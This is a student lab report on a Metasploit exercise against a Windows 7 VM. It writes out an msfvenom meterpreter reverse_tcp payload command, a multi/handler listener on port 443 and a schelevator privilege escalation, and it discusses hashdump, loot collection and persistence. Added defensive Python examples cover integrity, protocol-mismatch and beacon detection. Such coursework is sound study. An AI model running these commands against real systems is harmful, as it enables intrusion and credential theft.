
CST8602 Lab #5 Liban Abdi

Q1 - Fully document the output of all scans performed on the victim.


Determine which IP address you think is the victim
10.20.0.136
Explain why you think it is that IP address.
I used netdiscover with the option -r 10.20.0.0/24. It displays all devices on the network that are sending out ARP requests. We got three results: .1, .254 and .136. .1 is the gateway and .254 is the DHCP server, which leaves .136, the Windows 7 machine.

Q2 - Based on what NMap has found about the victim, how valuable would it be to do an
unauthenticated scan of the workstation IP with a vulnerability scanner such as
Nessus/NeXpose/OpenVAS? Explain your reasoning.

Not very valuable. nmap already gave us the running services and their versions, which is enough to search for known vulnerabilities.

V 1.4 November 7, 2018 Page 1 of 9

Q3 - What is the size (in bytes) of the backdoored game file? = 182784
What is the size (in bytes) of the original game file? = 118784
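The two sizes above differ by 64000 bytes, which is exactly the kind of change a file-integrity baseline catches before anyone runs the file. The following is an added example, not part of the lab report, showing how a defender baselines known-good binaries by size and SHA-256 and then flags any file whose contents changed. The file names and byte contents are constructed stand-ins for the game executable; only the comparison logic matters.

```python
import hashlib

# Constructed sample contents standing in for the lab's two binaries: the
# "original" game and a copy with extra bytes appended. The byte values are
# made up; only the size-and-hash comparison matters.
ORIGINAL_GAME = b"MZ" + bytes(range(256)) * 4          # 1026 bytes, constructed
BACKDOORED_GAME = ORIGINAL_GAME + b"\x90" * 300        # 1326 bytes, constructed


def fingerprint(data: bytes) -> dict:
    """Record the two properties a baseline keeps for each file: size and SHA-256."""
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


def build_baseline(files: dict) -> dict:
    """Snapshot a set of known-good files (name -> contents) into a baseline."""
    return {name: fingerprint(data) for name, data in files.items()}


def verify(files: dict, baseline: dict) -> list:
    """Compare current files against the baseline and return a list of findings.

    The hash decides whether a file changed; the size delta is reported alongside
    it because a trojanised executable that kept its size would still be caught
    by the hash, while a size change alone is an easy first triage signal.
    """
    findings = []
    for name, data in files.items():
        expected = baseline.get(name)
        if expected is None:
            findings.append({"file": name, "issue": "not in baseline"})
            continue
        actual = fingerprint(data)
        if actual["sha256"] != expected["sha256"]:
            findings.append({
                "file": name,
                "issue": "content changed",
                "size_delta": actual["size"] - expected["size"],
            })
    for name in baseline:
        if name not in files:
            findings.append({"file": name, "issue": "missing"})
    return findings


def demo() -> list:
    """Baseline the clean game, then verify a tree where it has been replaced."""
    baseline = build_baseline({"game.exe": ORIGINAL_GAME})
    current = {"game.exe": BACKDOORED_GAME, "readme.txt": b"constructed"}
    return verify(current, baseline)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

In practice the baseline is built from the vendor's distribution media or a freshly imaged machine and stored somewhere the workstation cannot write to; a report with a non-zero size delta on an executable is a strong reason to pull the file for analysis rather than let users launch it.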

Q4 - Describe in a way that a company CEO could understand what the above msfvenom
command does.

It creates a payload that will allow an attacker to gain access to the system, appends that payload to an exe file (in this case a game), and then encrypts it to make it undetectable to antivirus.

In addition, describe this in a way that a CEO could understand specifically what
“windows/meterpreter/reverse_tcp” is and what it does.

It's a payload that, once installed on a victim's machine, tries to send connection probes to the attacker's machine; it contains the IP address and port number needed to initialize the connection.

Q5 - Explain why we are using port 443.

If the victim has a firewall with egress filtering, important ports like 443 (HTTPS) will most probably be open.
What other ports would probably work just as well and why?

Ports 53, 22, etc. Most firewall egress filtering will allow these well-known ports.

Q6 - What is the difference between the reverse_tcp stager and the reverse_http stager?

In reverse_http, communication between the payload and Metasploit takes place over the HTTP protocol, so it is less suspicious.

reverse_tcp creates a regular TCP connection.


Under what circumstances would using the reverse_http stager be a better choice?

When you know the victim's machine is behind a firewall with egress filtering.
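Q5 and Q6 both turn on the same defensive gap: an egress firewall that filters on port number alone lets a "regular TCP connection" out on 443 because it never checks that the traffic is actually TLS. The following added example (not part of the lab report) shows the check a defender can add on the egress path: look at the first bytes a client sends on a well-known port and flag any flow whose protocol does not match the port. The flows, addresses and byte strings are constructed; 10.20.0.136 and 10.20.0.134 are the victim and handler addresses from the lab, the rest are made up.

```python
from dataclasses import dataclass

# Protocol a client is expected to speak on each well-known egress port.
# 443 should carry TLS, 80 plain HTTP, 22 SSH; anything else on those ports
# is a protocol/port mismatch worth a look. (Assumed policy for this example.)
EXPECTED_ON_PORT = {443: "tls", 80: "http", 22: "ssh"}

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    first_bytes: bytes  # first bytes the client sent after the TCP handshake


def classify(first_bytes: bytes) -> str:
    """Guess the application protocol from the client's first bytes.

    TLS: record type 0x16 (handshake), version 0x03 0x0X, then a ClientHello (0x01)
         as the handshake type at offset 5.
    HTTP: an ASCII method token followed by a space.
    SSH: the client identification string starts with "SSH-".
    Anything else is reported as unknown rather than guessed.
    """
    if (len(first_bytes) >= 6
            and first_bytes[0] == 0x16
            and first_bytes[1] == 0x03
            and first_bytes[2] in (0x00, 0x01, 0x02, 0x03)
            and first_bytes[5] == 0x01):
        return "tls"
    if first_bytes.startswith(HTTP_METHODS):
        return "http"
    if first_bytes.startswith(b"SSH-"):
        return "ssh"
    return "unknown"


def find_mismatches(flows) -> list:
    """Return (flow, observed_protocol) for flows whose traffic does not fit the port."""
    mismatches = []
    for flow in flows:
        expected = EXPECTED_ON_PORT.get(flow.dport)
        if expected is None:
            continue  # port not covered by the policy table, nothing to compare against
        observed = classify(flow.first_bytes)
        if observed != expected:
            mismatches.append((flow, observed))
    return mismatches


# Constructed flows from the lab's victim address. 203.0.113.10 and 10.20.0.50
# are made-up destinations; 10.20.0.134 is the handler address from the lab.
SAMPLE_FLOWS = [
    # Legitimate HTTPS: a TLS 1.2-style ClientHello record header.
    Flow("10.20.0.136", "203.0.113.10", 443, bytes.fromhex("160303 00c5 01 0000c1 0303")),
    # Plain HTTP sent to port 443: what an HTTP-speaking client on 443 looks like.
    Flow("10.20.0.136", "10.20.0.134", 443, b"GET /index HTTP/1.1\r\nHost: 10.20.0.134\r\n"),
    # Opaque binary on 443 that is not a TLS handshake: a raw TCP channel.
    Flow("10.20.0.136", "10.20.0.134", 443, bytes.fromhex("0010000000000000")),
    # Normal SSH on 22.
    Flow("10.20.0.136", "10.20.0.50", 22, b"SSH-2.0-OpenSSH_7.9\r\n"),
]

if __name__ == "__main__":
    for flow, observed in find_mismatches(SAMPLE_FLOWS):
        print(f"{flow.src} -> {flow.dst}:{flow.dport} expected "
              f"{EXPECTED_ON_PORT[flow.dport]}, saw {observed}")
```

Commercial firewalls implement this as application identification; the point of the toy version is that the raw-TCP flow and the plain-HTTP flow on 443 are both flagged while real HTTPS passes, which is exactly the distinction a port-only egress rule cannot make.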

Q7 - Describe two other ways that might work to get our malware onto a user’s workstation other
than via email or web. Assume social engineering may be required.

Having physical access to the system.

Giving the victim a malicious USB drive.

Q8 - Privilege escalation: Using only the meterpreter shell, attempt to escalate your privileges to
an Administrator or SYSTEM. Show how you did this and proof that it worked.

Ans = I used my own payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.20.0.133 LPORT=9393 -f exe -a x64 --platform windows

msfconsole

use multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 10.20.0.134

set LPORT 443

exploit

After getting a session, background the session.

Search for exploits that might work on this session:

use post/multi/recon/local_exploit_suggester

Then we find ms10_092_schelevator:

use exploit/windows/local/ms10_092_schelevator

Set the options, then:

exploit

Q9 - Reconnaissance: Using only the meterpreter shell, obtain and document all of the following
information from the victim workstation. You must show the information you obtained and
also show the commands you typed in meterpreter to get the information:

Sysinfo

TaskList

Users and HASHDUMP

Screenshot

Q10 - Pillaging: Using only the meterpreter shell, search user directories for potentially sensitive
documents and images. Download them to the lab5-loot directory. Show the contents of the
files you found, the full path of where you found them, and a description of what they
appear to be.

Q11 - Persistence: Using only the meterpreter shell, install meterpreter as a service so that it
persistently tries to connect back to your Kali VM on port 443 every 60 seconds.

Prove that it works by rebooting the Windows workstation and setting up another multi/handler
on Kali to demonstrate that you are able to get another meterpreter shell when it restarts.
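A service that reconnects to the same host and port every 60 seconds leaves a very regular pattern in outbound connection logs, and that regularity is what a defender looks for. The following is an added example, not part of the lab report, that groups constructed connection-log lines by (source, destination, port) and flags flows whose inter-connection intervals are near-constant. The log lines are made up; 10.20.0.136 and 10.20.0.134 are the victim and handler addresses used in the lab, 203.0.113.10 is a placeholder for ordinary browsing.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed outbound-connection log lines: UTC timestamp, source, destination,
# destination port. The 10.20.0.134 flow fires every 60 s like a reconnecting
# service; the 203.0.113.10 flow is irregular, like a person browsing.
SAMPLE_LOG = """\
2018-11-07T10:00:00Z 10.20.0.136 10.20.0.134 443
2018-11-07T10:00:04Z 10.20.0.136 203.0.113.10 443
2018-11-07T10:01:00Z 10.20.0.136 10.20.0.134 443
2018-11-07T10:01:31Z 10.20.0.136 203.0.113.10 443
2018-11-07T10:02:00Z 10.20.0.136 10.20.0.134 443
2018-11-07T10:02:17Z 10.20.0.136 203.0.113.10 443
2018-11-07T10:03:00Z 10.20.0.136 10.20.0.134 443
2018-11-07T10:04:00Z 10.20.0.136 10.20.0.134 443
2018-11-07T10:04:46Z 10.20.0.136 203.0.113.10 443
2018-11-07T10:05:00Z 10.20.0.136 10.20.0.134 443
"""


def parse_log(text: str) -> dict:
    """Group connection timestamps by (src, dst, dport)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = line.split()
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        flows[(src, dst, int(dport))].append(when)
    return flows


def find_beacons(flows: dict, min_connections: int = 5, max_jitter: float = 0.1) -> list:
    """Flag flows whose gaps between connections are near-constant.

    jitter = population stddev / mean of the gaps. A timer-driven reconnect
    (for example every 60 s) gives jitter close to 0, while user-driven traffic
    is irregular. Returns a list of (key, mean_gap_seconds, jitter).
    """
    beacons = []
    for key, times in flows.items():
        if len(times) < min_connections:
            continue  # too few samples to say anything about periodicity
        times = sorted(times)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            beacons.append((key, avg, jitter))
    return beacons


if __name__ == "__main__":
    for (src, dst, dport), avg, jitter in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{src} -> {dst}:{dport} every {avg:.0f}s (jitter {jitter:.2f})")
```

The thresholds are a starting point: a connect-back interval with randomised sleep raises the jitter, so in production the analyst tunes max_jitter against the environment's normal traffic and corroborates a hit with the protocol check on the port and with the fact that the connections survive a reboot, which is exactly what the persistence step above is designed to achieve.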

Q12 - Recommendations: What are two additional safeguards the client could implement to protect
themselves against this type of malware attack?

Using https://www.virustotal.com/#/home/url to check suspicious links.

Running up-to-date antivirus.


Which of the two would be the most effective and why?

Running up-to-date antivirus. In our case the Windows 7 machine didn't have a running antivirus. Even if the URL check fails to detect the malicious file, you should have a second line of defence that detects suspicious activity when the file is run, and that is done by the antivirus.
